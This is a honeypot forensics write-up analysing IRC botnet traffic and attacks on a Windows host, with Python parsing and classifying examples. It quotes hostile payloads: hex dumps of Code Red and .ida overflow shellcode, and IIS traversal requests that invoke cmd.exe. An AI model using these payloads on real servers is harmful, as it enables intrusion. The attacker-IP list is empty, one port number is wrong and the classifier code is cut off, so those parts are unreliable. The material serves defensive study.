Scan of the Month 27

Nir Hauser

hauserns at georgetown dot edu

April 18, 2003

Tools:

Ethereal: http://www.ethereal.com/

Snort: http://www.snort.org/

A simple rules.txt file for Snort:

alert ip any any -> any any

output alert_fast: alert.fast

Running Snort with this ruleset creates a file alert.fast that contains a one-line summary of every packet in the log.  It also creates a separate directory for every IP address involved in the log, breaking out each TCP or UDP session of that address.  Used together with Ethereal, this is a powerful way to pick a session apart.

Beginning Questions

1.  What is IRC?

Internet Relay Chat (IRC) is a system that allows multiple users to enter a chatroom and chat with one another.  It is built on a client/server architecture: IRC clients such as mIRC log in to an IRC server, where they find multiple channels to join.  IRC also supports file transfer and other operations.

2. What message is sent by an IRC client when it asks to join an IRC network?

First, the IRC client sends a TCP packet with the SYN flag set to port 6667, and the client and server then complete the three-way handshake.  This is what it looks like:

From Ethereal:

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384

35795 414909.304675 209.196.44.172        172.16.134.191        TCP      6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120

35796 414909.305433 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [ACK] Seq=4114925006 Ack=4266393802 Win=17520


The IRC client then sends an IRC packet requesting to use a nickname.  Here is the message that the honeypot sends to the IRC server 209.196.44.172:

NICK rgdiuggac

USER rgdiuggac localhost localhost :rgdiuggac

The IRC client then sends a request to join a channel. Here is the message that the honeypot sends to the IRC server 209.196.44.172:

JOIN #xŕéüîéđěx :sex0r

WHO rgdiuggac

Here the honeypot says it wants to join channel #xŕéüîéđěx and it identifies itself as rgdiuggac.

3.  What is a botnet?

A botnet is a collection of compromised computers that have joined an IRC channel.  First, a Trojan horse is installed on each compromised computer by some means.  That Trojan then attempts to log on to an IRC server.  Once it has joined the appropriate channel, it awaits commands.  A botnet can consist of thousands of zombie computers that sit idle, waiting for an opportunity to do something malicious.

4.  What are botnets commonly used for?

Botnets are always malicious.  The users whose computers have joined the botnet are always unaware that their computers have done so.  A botnet can command all of its zombies to begin a Distributed Denial of Service (DDoS) attack against a designated computer.  It can also order each of its members to attack other computers, install the Trojan on them, and bring them into the botnet.

5.  What TCP ports does IRC generally use?

IRC generally uses ports 6667 through 7000.  In this Scan, IRC always uses port 6667.

6.  What is a binary log file and how is one created?

A binary log file is a record of all network traffic that passes the host machine, stored in raw packet form rather than as text.  It is created with a sniffer such as Snort, which listens to all traffic on the network and writes it to the binary file.  Snort can then analyze the raw data and present it in a human-readable form, and Ethereal can read the same binary log and present the data in a GUI.  Once the log is loaded into Ethereal or Snort, filters can be applied to it in order to extract specific packets.

7.  What IRC servers did the honeypot, which has the IP address 172.16.134.191, communicate with?

The honeypot attempted to log onto the following IRC servers:

66.33.65.58

63.241.174.144

217.199.175.10

209.126.161.29

209.196.44.172

as you can see from the following entries:

34821 412112.717027 172.16.134.191        209.126.161.29        TCP      1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191        66.33.65.58           TCP      1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191        63.241.174.144        TCP      1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191        217.199.175.10        TCP      1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0


The honeypot successfully logs onto 209.196.44.172.

8.  During the observation period, how many distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172?

During the observation period, 6639 distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172.  This includes the hosts that were already logged in to 209.196.44.172 when the honeypot logged on.  When an IRC client logs into a channel, the server tells it the names of all the users that are currently logged in.  I counted this number.  I then monitored all the IRC responses afterwards and used a script to get the usernames of all the IRC clients that interacted with the server.  I added these two numbers to come to 6639.

9.  Assuming that each botnet host has a 56 kbps network link, what is the aggregate bandwidth of the botnet?

56 kbps × 6639 = 371,784 kbps = 371.784 Mbps
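The registration exchange in question 2 and the counting described in questions 8 and 9 can be scripted against the reassembled IRC streams. The following is an added example, not the author's script: it assumes RFC 1459 message framing and uses constructed streams modelled on the honeypot's NICK/USER/JOIN lines (the placeholder channel #xchanx stands in for the real channel name), counting distinct nicks from the server's NAMES replies plus the prefixes of later JOIN/PRIVMSG/QUIT messages.

```python
"""IRC registration and channel-population analysis (added example, not the
author's script).  Assumes the client-to-server and server-to-client byte
streams of the 6667/tcp session have already been reassembled, e.g. with
Ethereal's Follow TCP Stream, and that messages follow the RFC 1459 format.
"""
import re

# Constructed client stream modelled on the honeypot's registration.  The real
# channel name contains high-bit characters; "#xchanx" stands in for it.
CLIENT_STREAM = (
    "NICK rgdiuggac\r\n"
    "USER rgdiuggac localhost localhost :rgdiuggac\r\n"
    "JOIN #xchanx :sex0r\r\n"
    "WHO rgdiuggac\r\n"
)

# Constructed server stream: the NAMES replies (numeric 353) sent on join list
# the bots already present; later JOIN/PRIVMSG/QUIT lines name further bots.
SERVER_STREAM = (
    ":irc.example 001 rgdiuggac :Welcome\r\n"
    ":irc.example 353 rgdiuggac = #xchanx :@opbot rgdiuggac abcdefghi jklmnopqr\r\n"
    ":irc.example 353 rgdiuggac = #xchanx :stuvwxyza bcdefghij\r\n"
    ":irc.example 366 rgdiuggac #xchanx :End of /NAMES list.\r\n"
    ":zzzzyyyyx!zzzzyyyyx@10.0.0.9 JOIN :#xchanx\r\n"
    ":abcdefghi!abcdefghi@10.0.0.2 PRIVMSG #xchanx :hi\r\n"
    ":jklmnopqr!jklmnopqr@10.0.0.3 QUIT :Ping timeout\r\n"
    ":zzzzyyyyx!zzzzyyyyx@10.0.0.9 JOIN :#xchanx\r\n"   # rejoin: counted once
)


def parse_line(line):
    """Split one IRC message into (prefix, command, middle params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    return prefix, parts[0].upper(), parts[1:], trailing


def client_registration(stream):
    """Pull nick, username, realname and the joined channel out of the client stream."""
    info = {}
    for raw in stream.splitlines():
        if not raw.strip():
            continue
        _, cmd, params, trailing = parse_line(raw)
        if cmd == "NICK":
            info["nick"] = params[0]
        elif cmd == "USER":
            info["user"], info["realname"] = params[0], trailing
        elif cmd == "JOIN":
            info["channel"], info["key"] = params[0], trailing
    return info


def looks_like_bot(info):
    """Heuristic drawn from the session above: a human mIRC user rarely registers
    with nick, username and realname all identical and auto-generated looking."""
    nick = info.get("nick")
    same = nick is not None and nick == info.get("user") == info.get("realname")
    generated = bool(nick) and re.fullmatch(r"[a-z]{8,}", nick) is not None
    return same and generated


def distinct_hosts(stream, own_nick):
    """Nicks present when the bot joined (353 replies) plus every nick that later
    sent a message; the honeypot's own nick is excluded from the count."""
    nicks = set()
    for raw in stream.splitlines():
        if not raw.strip():
            continue
        prefix, cmd, _params, trailing = parse_line(raw)
        if cmd == "353" and trailing:
            nicks.update(name.lstrip("@+") for name in trailing.split())  # drop op/voice marks
        elif prefix and "!" in prefix:           # user prefix has the form nick!user@host
            nicks.add(prefix.split("!", 1)[0])
    nicks.discard(own_nick)
    return nicks


def aggregate_bandwidth_kbps(host_count, link_kbps=56):
    """Question 9's estimate: every bot sits on a 56 kbps link."""
    return host_count * link_kbps
```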


Intermediate Questions

1)  What IP source addresses were used in attacking the honeypot?

The following IP addresses were used in attacking the honeypot:


2.  What vulnerabilities did attackers attempt to exploit?

Windows 2000 NetBIOS Vulnerabilities

Windows uses Server Message Block (SMB) to let client applications read and write files on a server and request services from it.  Before Windows 2000, the only way to issue SMB commands was to connect to ports 137, 138, or 139 on the Windows machine and communicate over NetBIOS.  Windows 2000 also allows a client to issue SMB commands without NetBIOS, directly over a TCP/IP connection on port 445.  When a client wishes to talk SMB to a Windows 2000 machine, it usually sends the request to both port 139 and port 445.  If port 445 responds, the client proceeds to communicate over that port; otherwise only port 137 is used.  This is useful to know, because an attacker that queries port 137 but ignores port 445 may believe it is dealing with a version of Windows older than Windows 2000.

Attackers attempted to connect to the honeypot through NetBIOS.  NetBIOS is used by Windows machines to communicate over a LAN; file and printer sharing is done with SMB commands carried over NetBIOS.  Many attackers issued a name query to the honeypot's NetBIOS name service.  One such query looked like this:

1 0.000000    219.118.31.42         172.16.134.191        NBNS     Name query NBSTAT *<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>


Some attackers attempted to map the honeypot's C drive through NetBIOS.  This is the method used against earlier versions of Windows, and for that reason none of these attempts succeeded.  The request looked like this:

8 0.514274    219.118.31.42         172.16.134.191        SMB      Tree Connect AndX Request, Path: \\PC0191\C

Some attackers attempted to connect to the honeypot's IPC$ share.  The IPC$ share is also accessed through SMB, and clients use it to send commands to the server.  Once an attacker has logged in to the IPC$ share he can issue Remote Procedure Calls (RPC).  RPC is a client/server mechanism that lets a client invoke operations on the server through a programmer's interface.  Because the Administrator password on the honeypot is NULL, an attacker can log in with full Administrator privileges.  The request looks like this:

925 322205.478544 210.22.204.101        172.16.134.191        SMB      Tree Connect AndX Request, Path: \\172.16.134.191\IPC$


W32.HLLW.Deloder Worm

61.111.101.78 attacks the honeypot with the W32.HLLW.Deloder worm.  The worm connects to the honeypot's IPC$ share as described earlier and then tries a series of passwords, including the NULL password.  Once it connects, it installs a Trojan backdoor called INST.EXE.  It also drops the legitimate SysInternals utility PSEXESVC.EXE onto the victim's computer.  We can see Deloder installing PSEXESVC.EXE and INST.EXE in the following packets:

33280 412046.012158 61.111.101.78         172.16.134.191        SMB      NT Create AndX Request, Path: \System32\PSEXESVC.EXE

33678 412072.276580 61.111.101.78         172.16.134.191        SMB      NT Create AndX Request, Path: \System32\inst.exe


When we see these packets, we recognize the signature of the Deloder Worm.

Code Red Worm

Code Red is a self-propagating worm that exploits a buffer overflow in IIS.  First, 68.169.174.108 scanned the honeypot to see whether it runs IIS and is vulnerable to Code Red.  We can tell that this is most likely the Retina Code Red Scanner because it issues the following request to IIS:

GET /pagerror.gif HTTP/1.1\r\n

in the following packet:

65 28542.955886 68.169.174.108        172.16.134.191        HTTP     GET /pagerror.gif HTTP/1.1


218.25.147.83 later launches a Code Red attack against the IIS server running on the honeypot.  Code Red uses a buffer overflow to compromise IIS.  It sends the following four HTTP packets.

<packet #1>

32885 396968.463209 218.25.147.83         172.16.134.191        HTTP     GET


0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  05 d4 02 b0 40 00 6e 06 6d dc da 19 93 53 ac 10   ....@.n.m....S..

0020  86 bf 0e 32 00 50 94 47 ec 82 e7 ec 78 a8 50 18   ...2.P.G....x.P.

0030  44 10 75 2d 00 00 2f 64 65 66 61 75 6c 74 2e 69   D.u-../default.i

0040  64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   da?NNNNNNNNNNNNN

0050  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0060  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0070  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0080  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0090  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00a0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00b0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00c0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00d0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00e0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00f0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0100  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0110  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0120  4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00   NNN.............

0130  00 00 c3 03 00 00 00 78 00 fa 20 20 48 54 54 50   .......x..  HTTP

0140  2f 31 2e 30 0d 0a 38 25 75 63 62 64 33 25 75 37   /1.0..8%ucbd3%u7

0150  38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25   801%u9090%u6858%

0160  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909

0170  30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30   0%u9090%u8190%u0

0180  30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25   0c3%u0003%u8b00%

0190  75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37   u531b%u53ff%u007

01a0  38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48   8%u0000%u00=a  H

01b0  54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74   TTP/1.0..Content

01c0  2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a   -type: text/xml.

01d0  48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f   HOST:www.worm.co

01e0  6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43   m. Accept: */*.C

01f0  6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33   ontent-length: 3

0200  35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00   569 ....U.......

0210  00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8   .SVW............

0220  cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00   ........p.......

etc ...


<packet #2>

32886 396968.482227 218.25.147.83         172.16.134.191        HTTP     Continuation

(hex is not important for this packet)


<packet #3>

32888 396969.003930 218.25.147.83         172.16.134.191        HTTP     Continuation


0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  04 93 02 b5 40 00 6e 06 6f 18 da 19 93 53 ac 10   ....@.n.o....S..

0020  86 bf 0e 32 00 50 94 47 f7 da e7 ec 78 a8 50 18   ...2.P.G....x.P.

0030  44 10 de 1f 00 00 ff ff 8b 85 4c fe ff ff 83 c0   D.........L.....

0040  01 89 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11   ...L.....d......

0050  85 d2 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff   ..t.....j...L...

0060  50 8b 4d 08 8b 51 64 52 8b 85 78 fe ff ff 50 ff   P.M..QdR..x...P.

0070  95 c0 fe ff ff 3b f4 90 43 4b 43 4b c7 85 4c fe   .....;..CKCK..L.

0080  ff ff 00 00 00 00 8b 8d 68 fe ff ff 83 c1 07 89   ........h.......

0090  8d 64 fe ff ff eb 1e 8b 95 64 fe ff ff 83 c2 01   .d.......d......

00a0  89 95 64 fe ff ff 8b 85 4c fe ff ff 83 c0 01 89   ..d.....L.......

00b0  85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11 85 d2   .L.....d........

00c0  74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff 50 8b   t.....j...L...P.

00d0  8d 68 fe ff ff 83 c1 07 51 8b 95 78 fe ff ff 52   .h......Q..x...R

00e0  ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b 8b 45 08   ......;..CKCK.E.

00f0  8b 48 70 89 8d 4c fe ff ff 8b f4 6a 00 8b 95 4c   .Hp..L.....j...L

0100  fe ff ff 52 8b 45 08 8b 48 78 51 8b 95 78 fe ff   ...R.E..HxQ..x..

0110  ff 52 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c6   .R......;..CKCK.

0120  85 fc fe ff ff 00 8b f4 6a 00 68 00 01 00 00 8d   ........j.h.....

0130  85 fc fe ff ff 50 8b 8d 78 fe ff ff 51 ff 95 c4   .....P..x...Q...

0140  fe ff ff 3b f4 90 43 4b 43 4b 89 85 4c fe ff ff   ...;..CKCK..L...

0150  8b f4 8b 95 78 fe ff ff 52 ff 95 c8 fe ff ff 3b   ....x...R......;

0160  f4 90 43 4b 43 4b e9 0c fb ff ff eb fe e8 8c f5   ..CKCK..........

0170  ff ff eb 30 58 83 c0 05 55 57 53 56 50 6a 3c 8b   ...0X...UWSVPj<.

0180  f0 83 c6 0c 56 68 00 01 00 00 ff 70 08 ff 74 24   ....Vh.....p..t$

0190  28 ff 10 58 50 ff 74 24 18 ff 50 04 58 5e 5b 5f   (..XP.t$..P.X^[_

01a0  5d ff 20 90 e8 cb ff ff ff e8 7b f9 ff ff d0 f2   ]. .......{.....

01b0  27 6e f5 18 03 75 4b 3c 43 00 00 01 00 00 78 56   'n...uK<C.....xV

01c0  34 12 b8 78 56 34 12 58 50 8b bd 68 fe ff ff 89   4..xV4.XP..h....

01d0  47 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 4a ff   G...D$........J.

01e0  46 00 33 c0 c3 eb ec e8 f1 f4 ff ff 4c 6f 61 64   F.3.........Load

01f0  4c 69 62 72 61 72 79 41 00 47 65 74 53 79 73 74   LibraryA.GetSyst

0200  65 6d 54 69 6d 65 00 43 72 65 61 74 65 54 68 72   emTime.CreateThr

0210  65 61 64 00 43 72 65 61 74 65 46 69 6c 65 41 00   ead.CreateFileA.

0220  53 6c 65 65 70 00 47 65 74 53 79 73 74 65 6d 44   Sleep.GetSystemD

0230  65 66 61 75 6c 74 4c 61 6e 67 49 44 00 56 69 72   efaultLangID.Vir

0240  74 75 61 6c 50 72 6f 74 65 63 74 00 09 69 6e 66   tualProtect..inf

0250  6f 63 6f 6d 6d 2e 64 6c 6c 00 54 63 70 53 6f 63   ocomm.dll.TcpSoc

0260  6b 53 65 6e 64 00 09 57 53 32 5f 33 32 2e 64 6c   kSend..WS2_32.dl

0270  6c 00 73 6f 63 6b 65 74 00 63 6f 6e 6e 65 63 74   l.socket.connect

0280  00 73 65 6e 64 00 72 65 63 76 00 63 6c 6f 73 65   .send.recv.close

0290  73 6f 63 6b 65 74 00 09 77 33 73 76 63 2e 64 6c   socket..w3svc.dl

02a0  6c 00 00 47 45 54 20 00 3f 00 20 20 48 54 54 50   l..GET .?.  HTTP

02b0  2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79   /1.0..Content-ty

02c0  70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a 48 4f 53   pe: text/xml.HOS

02d0  54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f 6d 0a 20   T:www.worm.com.

02e0  41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 6f 6e 74   Accept: */*.Cont

02f0  65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 35 36 39   ent-length: 3569

0300  20 0d 0a 0d 0a 00 63 3a 5c 6e 6f 74 77 6f 72 6d    .....c:\notworm

0310  00 4c 4d 54 48 0d 0a 3c 68 74 6d 6c 3e 3c 68 65   .LMTH..<html><he

0320  61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71   ad><meta http-eq

0330  75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70   uiv="Content-Typ

0340  65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74   e" content="text

0350  2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65   /html; charset=e

0360  6e 67 6c 69 73 68 22 3e 3c 74 69 74 6c 65 3e 48   nglish"><title>H

0370  45 4c 4c 4f 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68   ELLO!</title></h

0380  65 61 64 3e 3c 62 61 64 79 3e 3c 68 72 20 73 69   ead><bady><hr si

0390  7a 65 3d 35 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72   ze=5><font color

03a0  3d 22 72 65 64 22 3e 3c 70 20 61 6c 69 67 6e 3d   ="red"><p align=

03b0  22 63 65 6e 74 65 72 22 3e 57 65 6c 63 6f 6d 65   "center">Welcome

03c0  20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77    to http://www.w

03d0  6f 72 6d 2e 63 6f 6d 20 21 3c 62 72 3e 3c 62 72   orm.com !<br><br

03e0  3e 48 61 63 6b 65 64 20 42 79 20 43 68 69 6e 65   >Hacked By Chine

03f0  73 65 21 3c 2f 66 6f 6e 74 3e 3c 2f 68 72 3e 3c   se!</font></hr><

0400  2f 62 61 64 79 3e 3c 2f 68 74 6d 6c 3e 20 20 20   /bady></html>  

0410  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0420  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0430  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0440  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0450  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0460  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0470  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0480  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0490  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

04a0  20   


<packet #4>

32889 396969.032378 218.25.147.83         172.16.134.191        HTTP     Continuation

(hex is not important for this packet)


The signature of the Code Red worm can be seen at the end of the third packet. It displays the following HTML message to the victim:

<html><head><meta http-equiv="Content-Type" content="text/html;
charset=English"><title>HELLO!</title></head><bady><hr size=5><font
color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked
By Chinese!</font></hr></bady></html>

Other IIS Buffer Overflows

210.22.204.101 and 24.197.194.106 attempt to exploit an IIS vulnerability using a buffer overflow.  The following two packets show 210.22.204.101's attack.  (Notice that in the last few lines of the second packet the attacker attempts to run cmd.exe, the Windows command prompt.)

<packet #1>

 1839 322275.638746 210.22.204.101        172.16.134.191        HTTP     GET

/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC


0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  05 dc 6b 08 40 00 6b 06 d7 6c d2 16 cc 65 ac 10   ..k.@.k..l...e..

0020  86 bf 06 8e 00 50 76 16 a7 9e 8b 5a 44 20 50 10   .....Pv....ZD P.

0030  fa f0 f3 19 00 00 47 45 54 20 2f 4e 55 4c 4c 2e   ......GET /NULL.

0040  49 44 41 3f 43 43 43 43 43 43 43 43 43 43 43 43   IDA?CCCCCCCCCCCC

0050  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0060  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0070  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0080  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0090  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00a0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00b0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00c0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00d0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00e0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00f0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0100  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0110  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0120  43 43 43 43 43 43 43 43 43 43 43 43 25 75 30 61   CCCCCCCCCCCC%u0a

0130  65 62 25 75 62 38 39 30 25 75 64 61 63 66 25 75   eb%ub890%udacf%u

0140  37 37 65 65 25 75 30 30 30 30 25 75 30 30 30 30   77ee%u0000%u0000

0150  25 75 38 33 38 62 25 75 30 30 39 34 25 75 30 30   %u838b%u0094%u00

0160  30 30 25 75 34 30 38 62 25 75 30 35 36 34 25 75   00%u408b%u0564%u

0170  30 31 35 30 25 75 30 30 30 30 25 75 65 30 66 66   0150%u0000%ue0ff

0180  25 75 39 30 39 30 3d 78 26 90 90 90 90 90 90 90   %u9090=x&.......

0190  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................

etc...


<packet #2>

1840 322275.638746 210.22.204.101        172.16.134.191        HTTP  Continuation


abbreviated hex ...

0250  c9 eb f6 fa d8 fd fd eb fc ea ea 99 ea eb 7f ee   ................

0260  a8 e9 7f ee 99 fa 5e f2 f8 26 63 6d 64 2e 65 78   ......^..&cmd.ex

0270  65 24 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73   e$ HTTP/1.1..Hos

0280  74 3a 20 31 37 32 2e 31 36 2e 31 33 34 2e 31 39   t: 172.16.134.19

0290  31 3a 38 30 0d 0a 0d 0a                           1:80....


Directory Traversing Vulnerability

24.197.194.106 also attempted to traverse the honeypot's directories through IIS.  Here are a few examples of the HTTP requests it issued:

HEAD /script/..\../..\../..\../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir /system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../..%\../..%\../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../..\../..\winnt/system32/cmd.exe?/c+dir c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../winnt/system32/cmd.exe?/c+dir r +dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir +dir HTTP/1.0\n


Notice that the attacker was trying to reach cmd.exe, the Windows command prompt, which would allow the attacker to execute commands on the honeypot.
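The Code Red, NULL.IDA and cmd.exe traversal requests above share a few recognisable shapes, and a defender can sort IIS request lines into those categories automatically. The following classifier is an added example, not part of the original analysis; its sample request lines are constructed from the captures quoted above with the filler shortened, and the label names are its own.

```python
"""Classify IIS request lines into the attack signatures this write-up discusses
(added example, not part of the original analysis).  The request lines below are
constructed from the captures quoted above; the filler runs are shortened."""
import re
from urllib.parse import unquote

SAMPLE_REQUESTS = [
    "GET /pagerror.gif HTTP/1.1",                                          # Retina Code Red scanner probe
    "GET /default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801 HTTP/1.0",  # Code Red
    "GET /NULL.IDA?" + "C" * 240 + "%u0aeb%ub890%udacf%u77ee HTTP/1.0",     # other .ida overflow
    "HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "HEAD /scripts/..%\\../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "HEAD /script/..\\../..\\../..\\../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",                                            # ordinary request
]


def classify(request_line):
    """Return (label, detail) for one HTTP request line."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return "malformed", request_line
    path, _, query = target.partition("?")
    # Decode twice so double-encoded traversals (..%255c..) are caught as well,
    # then treat backslashes like slashes, as IIS does.
    decoded = unquote(unquote(path)).replace("\\", "/")
    low = decoded.lower()
    if low.endswith("/pagerror.gif"):
        return "retina-code-red-scan", "probe for the IIS error image"
    if re.search(r"\.id[aq]$", low):              # requests handled by the idq.dll ISAPI filter
        filler = re.match(r"([A-Za-z])\1{99,}", query)
        words = re.findall(r"%u[0-9a-fA-F]{4}", query)
        if filler and words:
            char = filler.group(1)
            # The capture on this page uses N as filler; Code Red II used X.
            label = "code-red-ida-overflow" if char in "NX" else "ida-overflow-other-filler"
            return label, "%d x %r then %d %%u-encoded words" % (len(filler.group(0)), char, len(words))
    if "cmd.exe" in low and re.search(r"\.\.%?/", low):
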